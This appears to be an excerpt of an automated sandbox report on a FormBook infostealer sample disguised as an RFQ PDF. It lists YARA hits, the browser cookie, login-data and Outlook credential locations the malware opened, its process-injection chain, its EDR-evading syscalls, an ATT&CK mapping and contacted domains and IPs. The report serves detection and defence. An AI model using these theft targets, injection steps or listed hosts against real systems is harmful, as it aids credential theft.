            Source: Yara matchFile source: 00000003.00000002.4180631001.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181549221.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4183518506.0000000005370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181501421.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849454850.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4181594224.00000000025A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mfpmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1848742069.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849026159.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4180631001.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181549221.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4183518506.0000000005370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181501421.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849454850.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4181594224.00000000025A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630658 Sample: RFQ - 1239- PERSIAN GULF BI... Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 28 www.limiles.xyz 2->28 30 www.uarsg.xyz 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 7eCxfcmGdXWQyF2L.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mfpmp.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 7eCxfcmGdXWQyF2L.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.limiles.xyz 209.74.64.58, 49949, 49955, 49962 MULTIBAND-NEWHOPEUS United States 22->34 36 www.gnlokn.info 47.83.1.90, 50046, 50052, 50058 VODANETInternationalIP-BackboneofVodafoneDE United States 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.